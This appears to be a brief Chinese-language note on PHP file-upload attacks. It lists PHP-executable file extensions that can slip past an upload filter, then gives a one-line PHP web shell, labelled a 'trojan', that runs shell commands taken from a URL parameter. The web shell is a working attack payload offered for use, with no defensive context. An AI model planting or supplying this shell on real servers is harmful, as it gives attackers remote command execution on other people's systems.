1.php后缀限制
'php,php3,php4,php5,php6,php7,phpsh,inc,phtml','PHT';
2.php木马
<?php echo shell_exec($_GET['cmd']); ?>
